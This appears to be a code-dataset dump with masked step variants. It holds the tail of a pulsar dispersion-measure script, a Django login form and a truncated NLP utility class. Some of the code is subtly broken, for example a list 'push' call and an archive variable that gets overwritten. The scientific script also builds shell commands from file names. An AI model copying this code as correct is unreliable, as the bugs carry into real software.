profile.\n\nTscrunch : bool, optional, default: False. Collapse all sub-integrations\n to produce one profile.\n\ntscrunch : int, optional, default: None. Factor to scrunch sub-integrations\n for writing out the DM corrected file.\n \nquiet : bool, optional, default: False. Supresses all print statements\n except warnings and errors.\n\nReturns\n-------\nDispersion Measure with uncertainty.\n\n\nExamples\n--------\n# (a) for DM estimation with files in default directories:\n#\ndmcalc.py inputfile.fits\n#\n# (c) to use different ephemeris and template files:\n#\ndmcalc.py -E ephemeris.par -M model.fits data_file.fits\n#\n# (d) to write the DM corrected fits file and ToAs:\n#\n./dmcalc2.py -w -ptoa inputfile.fits\n\n'''\n\n\n# import modules...\nimport os\nimport sys\nimport numpy as np\nimport psrchive\nimport argparse\nimport time\nimport warnings\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\n\nstart = time.time()\n\nparser = argparse.ArgumentParser(description='Code for measuring in-band '+ \n 'DM for pulsar data in psrfits format.')\nparser.add_argument('files', nargs='+', type=str, \n\t\t\t\t\thelp='The list of fits file(s) for processing')\nparser.add_argument('-E', '--ephem', type=str, \n\t\t\t\t\thelp='Ephemeris file to update the model. 
Exits if not '+\n\t\t\t\t\t 'given or is not available in \"PWD/ephemerides\" '+\n\t\t\t\t\t 'directory')\nparser.add_argument('-M', '--model', nargs='+', type=str,\n\t\t\t\t\thelp='Model template for ToA generation. Exits if not '+ \n\t\t\t\t\t 'given or is not available in \"PWD/templates\" '+\n\t\t\t\t\t 'directory')\nparser.add_argument('-f','--fscrunch', type=int, default=1,\n\t\t\t\t\thelp='Factor to scrunch the number of channels for '+ \n\t\t\t\t\t 'doing DM estimation (Def: 1)')\nparser.add_argument('-b3f','--b3fscrunch', type=int, default=1,\n\t\t\t\t\thelp='Factor to scrunch the number of channels for '+ \n\t\t\t\t\t 'band3 GMRT data (Def: 1)')\nparser.add_argument('-b5f','--b5fscrunch', type=int, default=1,\n\t\t\t\t\thelp='Factor to scrunch the number of channels for '+ \n\t\t\t\t\t 'band5 GMRT data (Def: 1)')\nparser.add_argument('-w','--writeout', action='store_true',\n\t\t\t\t\thelp='Writes out the DM corrected file. Def: False')\nparser.add_argument('-ptoa','--print_toas', action='store_true',\n\t\t\t\t\thelp='Print the prefit ToAs to file in tempo2 format. '+\n\t\t\t\t\t 'Def: False')\nparser.add_argument('-F','--Fscrunch', action='store_true',\n\t\t\t\t\thelp='Fully scrunch the number of channels for the '+\n\t\t\t\t\t\t 'final output archive (Def: False)')\nparser.add_argument('-T','--Tscrunch', action='store_true',\n\t\t\t\t\thelp='Completely time scrunch all the integrations')\nparser.add_argument('-t','--tscrunch', type=int, default=1,\n\t\t\t\t\thelp='Factor to scrunch the number of integrations for '+ \n\t\t\t\t\t 'the final output archive (Def: None)')\nparser.add_argument('-o','--offset', type=float, default=0.670520675,\n\t\t\t\t\thelp='Offset to shift band 5 ToAs (in secs)')\nparser.add_argument('-q', '--quiet', action='store_true', \n\t\t\t\t\t\t\thelp='Only print warnings')\n\n\ndef main():\n\t\n\t# parses the input arguments\n\targs = parser.parse_args()\n\n\t# checks status of quiet and ptoa\n\tquiet=False\n\tif args.quiet:\n\t\tquiet=True\n\ttempo2=True\n\tptoa=False\n\tif args.print_toas:\n\t\tptoa=True\n\t\t\n\tif not quiet:\n\t\tprint(\"Loading the archive files for DM estimation\")\n\n\t# loads the psrfits file\n\tarchives = []\n\tfor filename in args.files:\n\t\tarchives.append(psrchive.Archive_load(filename))\n\tnarch = len(archives)\n\tif narch >= 1:\n\t\tif not quiet:\n\t\t\tprint(\"Appending the archives ...\"),\n\t\t# append data\n\t\tar = freq_appendData(narch, archives, args.offset, \n\t\t\t\t\t\t\targs.b3fscrunch, args.b5fscrunch)\n\t\tif not quiet:\n\t\t\tprint(\" done!\")\n\telse:\n\t\tif not quiet:\n\t\t\tprint(\"Only one archive was given, so nothing to frequency-append.\")\n\t# ar is the final archive after performing frequency append\n\tar = archives[0]\n\tdel archives\n\t\n\t# extracts relevant information from the archive\n\tar_psr = ar.get_source()\n\tar_nbins = ar.get_nbin()\n\tar_tel = ar.get_telescope()\n\tmjd_start=ar.get_Integration(0).get_start_time().in_days()\n\tmjd_end=ar.get_Integration(0).get_end_time().in_days()\n\tar_mjd = mjd_start + (mjd_end-mjd_start)/2.\n\tlength = ar.integration_length()\n\tar.update_centre_frequency()\n\tar_centfr = ar.get_centre_frequency()\n\tar_nchan = ar.get_nchan()\n\tar_bw = ar.get_bandwidth()\n\tar_chnwdth = ar_bw / ar_nchan\n\tffrac = args.fscrunch\n\tif not quiet:\n\t\tprint(\"\\nNow preparing for DM estimation\\n\")\n\n\tpwd=os.getcwd()\n\n\t# checks for ephemeris file and exit if not given or is not available\n\t# in the default directory \"PWD/ephemerides\".\n\tif args.ephem != 
None:\n\t\tephemeris = args.ephem\n\telse:\n\t\tephemeris = \"ephemerides/\"+ar_psr+\".par\"\n\t\tif not (os.path.exists(ephemeris)):\n\t\t\tsys.exit(1)\n\tif not quiet:\n\t\tprint (\"\\nEphemeris file is:\"+ephemeris+'\\n')\n\t\n\t# if template is given as input argument load and process them\n\tmodel = []\n\tfor filename in args.model:\n\t\tmodel.append(psrchive.Archive_load(filename))\n\tif args.model != None:\n\t\tif len(args.model) == 1:\n\t\t\tmodel = freq_appendModel(1,model,args.offset, args.b3fscrunch, args.b5fscrunch)\n\t\tif len(args.model) > 1:\n\t\t\tmodel = freq_appendModel(1,model,args.offset, args.b3fscrunch, args.b5fscrunch)\n\t# If the template is not given, looking for a matching template in the templates directory\n\tif args.model == None:\n\t\tif not quiet:\n\t\t\tprint(\"Looking for matching template in templates directory...\"),\n\t\timport subprocess\n\t\ttempdir=\"templates/*.sm\"\n\t\ttempfile=ar_psr+'_tmp.txt'\n\t\ta=subprocess.call(\"psredit -c name,nbin,bw,nchan,freq -Q '%s' > '%s'\"\n\t\t\t\t\t\t\t % (tempdir,tempfile), shell=True)\n\n\t\ttempnchan=\"\"\n\t\tt1=str(ar_nbins)\n\t\tif ar_tel=='gmrt':\n\t\t\tt2=str(int(ar_bw))\n\t\telse:\n\t\t\tt2=str((ar_bw))\n\t\tt3=('%.2f'%ar_centfr)\n\t\tf = open(tempfile,'r')\n\t\tfor line in f:\n\t\t\tline = line.strip()\n\t\t\tcolumns=line.split()\n\t\t\tt4 = float(columns[5])\n\t\t\tt4 = ('%.2f'%t4)\n\t\t\tif ar_tel=='gmrt':\n\t\t\t\tif (columns[1]==ar_psr and columns[2]==t1 and str(int(columns[3]))==t2 and t4==t3):\n\t\t\t\t\tmodeltempl=columns[0]\n\t\t\t\t\ttempnchan=columns[4]\n\t\t\t\t\tif not quiet:\n\t\t\t\t\t\tprint (' done\\n')\n\t\t\telse:\n\t\t\t\tif (columns[1]==ar_psr and columns[2]==t1 and str((columns[3]))==t2 and t4==t3):\n\t\t\t\t\tmodeltempl=columns[0]\n\t\t\t\t\ttempnchan=columns[4]\n\t\t\t\t\tif not quiet:\n\t\t\t\t\t\tprint (' done\\n')\n\t\tif modeltempl=='' and tempnchan=='':\n\t\t\t\n\t\t\tprint(\"\\n** No matching template found for DM fitting. Exiting. **\\n\")\n\t\t\tsys.exit(1)\n\t\tf.close()\n\t\tos.remove(tempfile)\n\t\tif not quiet:\n\t\t\tprint(\"Found matching template: \"+modeltempl)\n\t\tmodel.append(psrchive.Archive_load(modeltempl))\n\tif not quiet:\n\t\tprint(\"\\nEstimating the DM from the observation\")\n\tmodel.update_centre_frequency()\n\n\t# cloning the original file for passing to DMCalc() routine\n\tarch = ar.clone()\n\n\t# Calling the DM estimation routine\t\n\tdmval, dmverr, fitchisq, pre_rms, post_rms, ToA_Err = DMCalc(arch, ar_nchan, ar_centfr, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t ar_bw, ar_psr, ar_tel, ar_mjd, model, \n\t\t\t\t\t\t\t\t\t \t\t\t\t\t ephemeris, pwd, ffrac, quiet, tempo2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t ptoa, narch)\n\t\n\t# writing out the final DM corrected file, if requested\n\tif args.writeout:\n\t\t# removing the DM and DMEPOCH from the ephemeris file for uptation\n\t\tinfile = open(ephemeris,\"r\")\n\t\ttmpeph = ar_psr+'.eph'\n\t\toutput = open(tmpeph,\"w+\")\n\t\tfor i, line in enumerate(infile):\n\t\t\tif not line.lstrip().startswith('DM'):\n\t\t\t\t\tif not line.lstrip().startswith('DMEPOCH'):\n\t\t\t\t\t\toutput.write(line)\n\t\tinfile.close()\n\t\toutput.close()\n\t\t# updating the ephemeris file with measured DM\n\t\tdmline = \"DM\t\t\t \"+str(dmval)+\"\\t\\t\"+str(dmverr)\n\t\tdmepochline = \"DMEPOCH\t\t \"+str(round(ar_mjd,2))\n\t\tif not args.quiet:\n\t\t\tprint(\"Updating the ephemeris with new DM... 
\"),\n\t\tf = open(tmpeph,'a')\n\t\tf.write(\"%s\\n %s\\n\" % (dmline, dmepochline))\n\t\tif not args.quiet:\n\t\t\tprint(\" done!\")\n\t\tf.close()\n\n\t\t# updating the ephemeris in the archive with the measured DM\n\t\tif not quiet:\n\t\t\tprint(\"Correcting the DM of the observed file and writing it out... \"),\n\t\tos.remove(tmpeph)\n\t\t# creating the directory for writing the file\n\t\tdirfinal=os.path.join(pwd,ar_psr+\"_\"+ar_tel+\"_final\")\n\t\tif not os.path.exists(dirfinal):\n\t\t\tos.makedirs(dirfinal)\n\t\t# filename with path of the DM corrected file\n\t\toutfile = dirfinal+\"/\"+ar_psr + \"_\" + str(ar_mjd) + \"_\" + ar_tel + \".ar\"\n\n\t\t# Setting the DMC flag to 1. In other words, doing the DM correction.\n\t\tar.set_dispersion_measure(dmval)\n\t\tar.dedisperse()\n\t\t# Performing different scrunching in the archive for writing out\n\t\tif not args.Tscrunch:\n\t\t\tar.tscrunch(args.tscrunch)\n\t\telse:\n\t\t\tar.tscrunch()\n\t\tif not args.Fscrunch:\n\t\t\tar.fscrunch(ffrac)\n\t\telse:\n\t\t\tar.fscrunch()\n\t\t# Writing out the DM corrected, time/frequency scrunched file.\n\t\tar.unload(outfile)\n\t\tif not args.quiet:\n\t\t\tprint(\" done!\")\n\t\tdel ar\n\t\tif not quiet:\n\t\t\tprint(\"The file is corrected for DM and is written out to\\n\"+outfile)\n\t# Printing the results to the file and also in the terminal\n\tf= open(ar_psr+\"_DM_timeseries.txt\",'a')\n\tf.write('%s %.4f %.6f %.6f %.2f %.4f %.4f %.4f %.2f %.2f %s\\n' %( filename, \\\n\t\t\tar_mjd, dmval, dmverr, fitchisq, pre_rms, post_rms, ToA_Err, ar_centfr, \\\n\t\t\tar_bw, ar_tel))\n\tf.close()\n\n\timport time\n\tend = time.time()\n\ttotal = end - start\n\tprint ('-----------------------------------------------------------------------------')\n\tprint ('MJD\\t\\tDM\\t\\tDMerr\\t\\tChisq\\tC_Fr\\tBW\\tTel')\n\tprint ('%.6f\\t%.6f\\t%.6f\\t%.2f\\t%.1f\\t%.1f\\t%s' % (ar_mjd, dmval, dmverr, \n\t\t\tfitchisq, ar_centfr, ar_bw, ar_tel) )\n\t\n\tprint ('-----------------------------------------------------------------------------')\n\n\tprint(\"\\nThe program took %.1f seconds to finish\"%total)\n#-------------------------------------------------------------------------------------------#\n\n''' Main function that performs the DM estimation '''\ndef DMCalc(ar, ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model, ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch): \n\t# Checks if model file is available.\n\tif model == None:\n\t\tsys.exit(1)\n\tinit_dm = ar.get_dispersion_measure()\n\t# setting up the ToA estimation routine using the psrchive ArrivalTime()\n\tif not quiet:\n\t\tprint(\"Using the ArrivalTime (pat) with PGS in Tempo2 format\")\n\tarrtim = psrchive.ArrivalTime()\n\tarrtim.set_shift_estimator('PGS')\n\tarrtim.set_format('Tempo2')\n\tarrtim.set_format_flags('IPTA')\n\tif not quiet:\n\t\tprint(\"Loading the template file for processing... \"),\n\tstd = model.clone()\n\tstd.pscrunch()\n\tstd.tscrunch()\n\tstd_nchan = std.get_nchan()\n\t\n\tstd.dedisperse()\n\tstd.fscrunch(ffrac)\n\tarrtim.set_standard(std)\n\tif not quiet:\n\t\tprint(\" done!\")\n\tar.fscrunch(ffrac)\n\tar.pscrunch()\n\tar.tscrunch()\n\tarrtim.set_observation(ar)\n\tif not quiet:\n\t\tprint(\"Finding the ToAs... 
\"),\n\n\t# Finding the ToAs and reading it into numpy arrays\n\ttoas = arrtim.get_toas()\n\ttoas_filtered = [x.split()[:5] for x in toas] \n\tstr_filename,str_freq,str_mjd,str_toaErr,str_site = zip(*toas_filtered)\n\tfreq = np.asarray(str_freq, dtype=np.float64)\n\tamjd = np.asarray(str_mjd, dtype=np.float64)\n\tterr = np.asarray(str_toaErr, dtype=np.float64)\n\tif not quiet:\n\t\tprint(\" done!\")\n\t\tprint(\"Removing the bad ToAs using Huber Regression... \"),\n\t# removing the ToAs with zero errors\n\tcondition1 = terr < 3*np.median(terr)\n\tfreqnew = np.extract(condition1,freq)\n\tamjdnew = np.extract(condition1,amjd)\n\tterrnew = np.extract(condition1,terr)\n\t# writing the ToAs to a temporary file for getting the non-phase resolved ToAs using general2\n\ttempfile = ar_psr+\"_tmp.txt\"\n\tf = open(tempfile,\"w+\")\n\thead=\"FORMAT 1\\n\"\n\tf.write('%s' % head)\n\tfor i in range(0,np.size(freqnew)):\n\t\tf.write('%s %.12f %.20f %.8f %s\\n' % \n\t\t\t\t(str_filename[0], freqnew[i], amjdnew[i], terrnew[i], str_site[0]))\n\tf.close()\n\ttmpstr=\"tempo2 -output general2 -f\"\n\ttmp = os.popen(tmpstr+\" %s %s -s \\\"1111111 {freq} {pre} {err}\\n\\\" | grep '1111111'\" %\n\t\t\t\t\t (ephemeris,tempfile)).read()\n\tos.remove(tempfile)\n\n\t# extracting the data from general2 output\n\ttmp1 = tmp.split('\\n')\n\tfreqtmp = np.zeros(np.size(amjdnew))\n\ttoastmp = np.zeros(np.size(amjdnew))\n\tTErrtmp = np.zeros(np.size(amjdnew))\n\tfor i in range(np.size(amjdnew)):\n\t\t_,freqtmp[i],toastmp[i],TErrtmp[i] = (tmp1[i].split())\n\tTErrtmp /= 1e+6\n\t# importing libraries for outlier removal\n\tfrom sklearn import linear_model\n\tfrom sklearn.linear_model import HuberRegressor\n\tfrom sklearn.preprocessing import PolynomialFeatures\n\tfrom sklearn.pipeline import make_pipeline\n\t# changing the shape of frequency array\n\tfreqarr = freqtmp.reshape(-1,1)\n\t# making a nu^2 model and fitting using Huber Regression\n\ttoastmp *= 1e+6\n\ttoashift = (np.min(toastmp)*-1.5)\n\ttoastmp += toashift\n\tTerrtmp = TErrtmp*1e+6\n\tmodel = make_pipeline(PolynomialFeatures(2), HuberRegressor())\n\tmodel.fit(freqarr,toastmp,\n\t\t\t huberregressor__sample_weight=np.ravel(1./Terrtmp))\n\ty_pred = model.predict(freqarr)\n\tresiduals = toastmp - y_pred\n\tmedian = np.median(residuals)\n\tMAD = np.median(np.abs(residuals-np.median(residuals)))/0.6744897501960817\n\t# filtering the good ToAs\n\tcondition2 = (residuals > median - 3*MAD) & (residuals < median + 3*MAD)\n\tfreqf = np.around(np.extract(condition2,freqarr),3)\n\tamjdf = np.extract(condition2,amjdnew)\n\ttoasf = np.extract(condition2,toastmp)\n\tterrf = np.extract(condition2,TErrtmp)\n\tprefit_rms = np.sqrt(np.cov(toasf, aweights=terrf))\n\t\n\tterrf *= 1e+6\n\tif not quiet:\n\t\tprint(\" done!\")\n\t# writing out the ToAs in proper format\n\tif ptoa:\n\t\tif not quiet:\n\t\t\tprint ('Writing out ToAs into a file in tempo2 format'),\n\t\tdirtoas=os.path.join(pwd,ar_psr+\"_\"+ar_tel+\"_ToAs\")\n\t\tif not os.path.exists(dirtoas):\n\t\t os.makedirs(dirtoas)\n\t\toutfile=dirtoas+\"/\"+ar_psr+\"_\"+str(ar_mjd)+\"_\"+ar_tel+\"_ToAs.txt\"\n\t\tf = open(outfile,\"w+\")\n\t\thead=\"FORMAT 1\"\n\t\tf.write('%s\\n' % head)\n\t\tfor i in range(0,np.size(freqf)):\n\t\t\tf.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i], amjdf[i], terrf[i], str_site[0]))\n\t\tf.close()\n\t\tif not quiet:\n\t\t\tprint(\"done!\")\n\n\t# Fitting the ToAs with tempo2 for DM\n\tif not quiet:\n\t\tprint(\"\\nWriting the ToAs to a temporary file for tempo2 
fitting...\"),\n\toutfiletmp=ar_psr+\"tmp_ToAs.txt\"\n\tf = open(outfiletmp,\"w+\")\n\thead=\"FORMAT 1\"\n\tf.write('%s\\n' % head)\n\tfor i in range(0,np.size(freqf)):\n\t\tf.write('%s %.8f %.18f %.6f %s\\n' % (str_filename[0], freqf[i], amjdf[i], terrf[i], str_site[0]))\n\tf.close()\n\tif not quiet:\n\t\tprint(\" done!\\n\")\n\t# performing the fit\n\tdmstr=os.popen(\"tempo2 -f %s %s -nofit -fit dm | grep 'DM (cm^-3 pc)'| awk \\'{print $5,$6}\\'\" \n\t\t\t\t\t% (ephemeris, outfiletmp)).read()\n\t(dm, dmerr) = dmstr.split()\n\tdmval = float(dm)\n\tdmverr = float(dmerr)\n\t# doing the fit again to read the chisquare\n\tchisqstr=os.popen(\"tempo2 -f %s %s -nofit -fit dm | grep 'Fit Chisq'| awk \\'{print $9}\\'\" \n\t\t\t\t\t% (ephemeris, outfiletmp)).read()\n\tfitchisq = float(chisqstr)\n\tos.remove(outfiletmp)\n\n\t# Preparing the data for plotting the residuals, prefit and postfit\n\tinfile = open(ephemeris,\"r\")\n\ttmpeph1 = ar_psr+'_tmpeph.eph'\n\toutput = open(tmpeph1,\"w+\")\n\tfor i, line in enumerate(infile):\n\t\tif not line.lstrip().startswith('DM'):\n\t\t\t\tif not line.lstrip().startswith('DMEPOCH'):\n\t\t\t\t\toutput.write(line)\n\tinfile.close()\n\toutput.close()\n\t# updating the ephemeris file with measured DM\n\tdmline = \"DM \"+str(dmval)+\"\\t1\\t\"+str(dmverr)\n\tdmepochline = \"DMEPOCH\t \"+str(round(ar_mjd,2))\n\tf = open(tmpeph1,'a')\n\tf.write('%s\\n%s\\n' % (dmline, dmepochline))\n\tf.close()\n\tnewarch = ar.clone()\n\tnewarch.tscrunch()\n\tnewarch.set_dispersion_measure(dmval)\n\tarrtim.set_observation(newarch)\n\tarrtim.set_standard(std)\n\ttoas1 = arrtim.get_toas()\n\ttoas1_filtered = [x.split()[:5] for x in toas1] \n\tstr_filename1,str_freq1,str_mjd1,str_toaErr1,str_site1 = zip(*toas1_filtered)\n\tfreq1 = np.asarray(str_freq1, dtype=np.float64)\n\tamjd1 = np.asarray(str_mjd1, dtype=np.float64)\n\tterr1 = np.asarray(str_toaErr1, dtype=np.float64)\n\tfreqnew1 = np.extract(condition1,freq1)\n\tamjdnew1 = np.extract(condition1,amjd1)\n\tterrnew1 = np.extract(condition1,terr1)\n\ttempfile1 = ar_psr+\"_tmp1.txt\"\n\tf = open(tempfile1,\"w+\")\n\thead=\"FORMAT 1\\n\"\n\tf.write('%s' % head)\n\tfor i in range(0,np.size(freqnew1)):\n\t\tf.write('%s %.12f %.20f %.8f %s\\n' % (str_filename1[0], freqnew1[i], amjdnew1[i], terrnew1[i], str_site1[0]))\n\tf.close()\n\n\ttmp2 = os.popen(\"tempo2 -output general2 -f %s %s -s \\\"1111111 {freq} {pre} {err}\\n\\\" | grep '1111111'\" \n\t\t\t\t\t% (tmpeph1,tempfile1)).read()\n\tos.remove(tempfile1)\n\tos.remove(tmpeph1)\n\t# extracting the data from general2 output\n\ttmp3 = tmp2.split('\\n')\n\tfreqtmp2 = np.zeros(np.size(amjdnew1))\n\ttoastmp2 = np.zeros(np.size(amjdnew1))\n\tTErrtmp2 = np.zeros(np.size(amjdnew1))\n\tfor i in range(np.size(amjdnew1)):\n\t\t_,freqtmp2[i],toastmp2[i],TErrtmp2[i] = (tmp3[i].split())\n\tfreqf1 = np.around(np.extract(condition2,freqtmp2),3)\n\tamjdf1 = np.extract(condition2,amjdnew1)\n\ttoasf1 = np.extract(condition2,toastmp2)\n\tterrf1 = np.extract(condition2,TErrtmp2)\n\ttoasf1 *= 1e+6\n\tpostfit_rms = np.sqrt(np.cov(toasf1, aweights=terrf1))\n\tar_nbin = newarch.get_nbin()\n\tar_nchn = newarch.get_nchan()\n\tif (narch == 1):\n\t\tfreq_bot = (ar.get_centre_frequency() - ar_bw/2.0)\n\t\tfreq_top = (ar.get_centre_frequency() + ar_bw/2.0)\n\tif (narch > 1):\n\t\tif (ar_bw == 200.):\n\t\t\tfreq_bot = 400.0\n\t\t\tfreq_top = 1460.0\n\t\tif (ar_bw == 400.):\n\t\t\tfreq_bot = 300.0\n\t\t\tfreq_top = 1460.0\n\t# Getting the profile data for 
plotting\n\tnewarch.dedisperse()\n\tnewarch.remove_baseline()\n\tprofdata2D = newarch.get_data()[:,0,:,:].flatten().reshape(ar_nchn,ar_nbin)\n\tprof = newarch.clone()\n\tprof.fscrunch()\n\tprofdata1D = prof.get_data().flatten()\n\tprofdata1D /= np.max(profdata1D)\n\tresidDM = init_dm - dmval\n\tdmcurve = 4.15 * 1000. * residDM * ( (1./(np.min(freqf)/1000.)**2) - (1./(freqf/1000.)**2) )\n\tdmoff = np.median(toasf) - np.median(dmcurve)\n\tdmcurve += dmoff\n\t# Now does the actual plotting\t\n\tfig = plt.figure(3, figsize=(8, 6))\n\tfig.subplots_adjust(hspace=0.05)\n\tax0 = plt.subplot2grid((3, 8), (0,0), rowspan=2, colspan=3)\n\tax1 = plt.subplot2grid((3, 8), (2,0), rowspan=1, colspan=3)\n\tax2 = plt.subplot2grid((3, 8), (0,4), colspan=4)\n\tax3 = plt.subplot2grid((3, 8), (1,4), colspan=4)\n\tax4 = plt.subplot2grid((3, 8), (2,4), colspan=4)\n\tax0.imshow((np.sqrt(profdata2D**2))**0.5, origin='lower', extent=(0,ar_nbin-1,freq_bot,freq_top), aspect='auto', cmap='hot')\n\tax0.set_ylabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n\tax0.tick_params(axis='x', which='both', bottom=True, top=True, \n\t\t\tlabelbottom=False)\n\tax1.plot(np.arange(ar_nbin, dtype=float),profdata1D, color='black', linewidth=0.5)\n\tax1.set_xlim(0,ar_nbin-1)\n\tax1.set_xlabel('Pulse Phase (bins)', fontweight='bold', fontsize=12)\n\tax1.set_ylabel('Intensity', fontweight='bold', fontsize=12)\n\tax2.errorbar(freqtmp, toastmp, yerr=Terrtmp,fmt='.', color='gray', label='Prefit: Unfiltered', capsize=2)\n\tax2.plot(freqtmp, y_pred,'--r', label='Polynomial Fit')\n\tax2.set_xlim(freq_bot, freq_top)\n\tax2.grid()\n\tax2.legend(loc='upper right')\n\tax2.axes.xaxis.set_ticklabels([])\n\tax3.yaxis.set_label_position(\"right\")\n\tax3.errorbar(freqf, toasf-np.median(toasf), terrf,fmt='.k', label='Prefit: Filtered', capsize=2)\n\tax3.set_xlim(freq_bot, freq_top)\n\tax3.grid()\n\tax3.legend(loc='upper right')\n\tax3.axes.xaxis.set_ticklabels([])\n\tax3.set_ylabel(r'ToA Residuals ($\\mu$s)', fontweight='bold', fontsize=12)\n\tax4.errorbar(freqf1, toasf1-np.median(toasf1), terrf1, fmt='.r', label='Postfit', capsize=2)\n\tax4.set_xlim(freq_bot, freq_top)\n\tax4.grid()\n\tax4.legend(loc='upper right')\n\tax4.set_xlabel('Frequency (MHz)', fontweight='bold', fontsize=12)\n\tfig.suptitle('Source: PSR %s; MJD: %.4f; Prefit Wrms: %.2f $\\mu$s; Postfit Wrms: %.2f $\\mu$s\\nMedian ToA Err: %.2f $\\mu$s; DM: %.6f $\\pm$ %.6f pc cm$^{-3}$; Reduced $\\chi^2$: %.2f' % (ar.get_source(), ar_mjd, prefit_rms, postfit_rms, np.median(terrf1), dmval, dmverr, fitchisq), fontsize=11, fontweight='bold')\n\tdirplot=os.path.join(pwd,ar_psr+\"_\"+ar_tel+\"_plots\")\n\tif not os.path.exists(dirplot):\n\t os.makedirs(dirplot)\n\tplotfile=dirplot+\"/\"+ar_psr+\"_\"+str(ar_mjd)+\"_\"+str(ar_centfr)+\"_\"+ar_tel+\"_DMfitResid.pdf\"\n\tplt.savefig(plotfile, format='pdf')\n\tplt.close()\n\tif not quiet:\n\t\tprint ('done!')\n\tdel ar\n\treturn(dmval, dmverr, fitchisq, prefit_rms, postfit_rms, np.median(terrf1))\n\n\n''' Frequency appending the data archives '''\ndef freq_appendData(narch, archives, offset, b3scrunch, b5scrunch):\n\n\tfor i in range(narch):\n\t\tarchives[i].tscrunch()\n\t# GMRT specific Jump. This is not ideal, as these jumps calculated by tempo2 \n\t# will be dependent on the pulsar period. Default values of this jump given \n\t# is from the timing of PSR J1643-1224. 
\n\t# PS: this jump is valid for only cycle 37 dataset (or the given MJD limits).\n\tif (archives[0].get_telescope() == 'GMRT'):\n\t\tfor i in range(narch):\n\t\t\tar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n\t\t\tar_frq = archives[i].get_centre_frequency()\n\t\t\tar_bw = archives[i].get_bandwidth()\n\t\t\tperiod = (archives[i].get_Integration(0).get_folding_period())\n\t\t\toffset = 0.670520675\n\t\t\tjump = (offset/period) - int(offset/period)\n\t\t\tif (ar_frq >= 1260. and ar_frq < 1460.):\n\t\t\t\tif (ar_mjd >=58810. and ar_mjd < 58991.):\n\t\t\t\t\tarchives[i].rotate_phase(-jump)\n\tfreq_append = psrchive.FrequencyAppend()\n\tttfreq = archives[0].get_centre_frequency()\n\tif (300. < ttfreq < 500.):\n\t\tarchives[0].fscrunch(b3scrunch)\n\tif (1160. < ttfreq < 1460.):\n\t\tarchives[0].fscrunch(b5scrunch)\n\n\tfreq_append.init(archives[0])\n\twhile len(archives) > 1:\n\t\tttfreq = archives[1].get_centre_frequency()\n\t\tif (300. < ttfreq < 500.):\n\t\t\tarchives[1].fscrunch(b3scrunch)\n\t\tif (1160. < ttfreq < 1460.):\n\t\t\tarchives[1].fscrunch(b5scrunch)\n\t\t\n\t\tfreq_append.append(archives[0],archives[1])\n\t\tdel archives[1]\n\treturn(archives[0])\n\n''' Frequency Appending the Templates '''\ndef freq_appendModel(narch, archives, offset, b3scrunch, b5scrunch):\n\n\tfor i in range(narch):\n\t\tarchives[i].tscrunch()\n\t# GMRT specific Jump. This is not ideal, as these jumps calculated by tempo2 \n\t# will be dependent on the pulsar period. Default values of this jump given \n\t# is from the timing of PSR J1643-1224. \n\t# PS: this jump is valid for only cycle 37 dataset (or the given MJD limits).\n\tif (archives[0].get_telescope() == 'GMRT'):\n\t\tfor i in range(narch):\n\t\t\tar_mjd = archives[i].get_Integration(0).get_start_time().in_days()\n\t\t\tar_frq = archives[i].get_centre_frequency()\n\t\t\tar_bw = archives[i].get_bandwidth()\n\t\t\tperiod = (archives[i].get_Integration(0).get_folding_period())\n\t\t\toffset = 0.670520675\n\t\t\tjump = (offset/period) - int(offset/period)\n\t\t\tif (ar_frq >= 1260. and ar_frq < 1460.):\n\t\t\t\tif (ar_mjd >=58810. and ar_mjd < 58991.):\n\t\t\t\t\tarchives[i].rotate_phase(-jump)\n\n\tfreq_append = psrchive.FrequencyAppend()\n\tttfreq = archives[0].get_centre_frequency()\n\tif (300. < ttfreq < 500.):\n\t\tarchives[0].fscrunch(b3scrunch)\n\tif (1160. < ttfreq < 1460.):\n\t\tarchives[0].fscrunch(b5scrunch)\n\tfreq_append.init(archives[0])\n\twhile len(archives) > 1:\n\t\tttfreq = archives[1].get_centre_frequency()\n\t\tif (300. < ttfreq < 500.):\n\t\t\tarchives[1].fscrunch(b3scrunch)\n\t\tif (1160. < ttfreq < 1460.):\n\t\t\tarchives[1].fscrunch(b5scrunch)\n\t\tfreq_append.append(archives[0],archives[1])\n\t\tdel archives[1]\n\treturn(archives[0])\n\n#----------------------------------------------------------------------------------#\n\nmain()\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from django import forms
class LoginForm(forms.Form):
usuario=forms.CharField(label="Usuario",max_length=20, required=True, widget=forms.TextInput(
attrs={'class':'form-control'}
))
contraseña=forms.CharField(label="Contraseña",max_length=20, widget=forms.PasswordInput(
attrs={'class':'form-control'}
))
|
normal
|
{
"blob_id": "7da5a7476c807619bed805cb892774c23c04c6f7",
"index": 4917,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass LoginForm(forms.Form):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass LoginForm(forms.Form):\n usuario = forms.CharField(label='Usuario', max_length=20, required=True,\n widget=forms.TextInput(attrs={'class': 'form-control'}))\n contraseña = forms.CharField(label='Contraseña', max_length=20, widget=\n forms.PasswordInput(attrs={'class': 'form-control'}))\n",
"step-4": "from django import forms\n\n\nclass LoginForm(forms.Form):\n usuario = forms.CharField(label='Usuario', max_length=20, required=True,\n widget=forms.TextInput(attrs={'class': 'form-control'}))\n contraseña = forms.CharField(label='Contraseña', max_length=20, widget=\n forms.PasswordInput(attrs={'class': 'form-control'}))\n",
"step-5": "from django import forms\n\nclass LoginForm(forms.Form):\n usuario=forms.CharField(label=\"Usuario\",max_length=20, required=True, widget=forms.TextInput(\n attrs={'class':'form-control'} \n ))\n contraseña=forms.CharField(label=\"Contraseña\",max_length=20, widget=forms.PasswordInput(\n attrs={'class':'form-control'}\n ))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
class NlpUtility():
"""
Utility methods to get particular parts of speech from a token set
"""
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == "NN":
nouns.push(word)
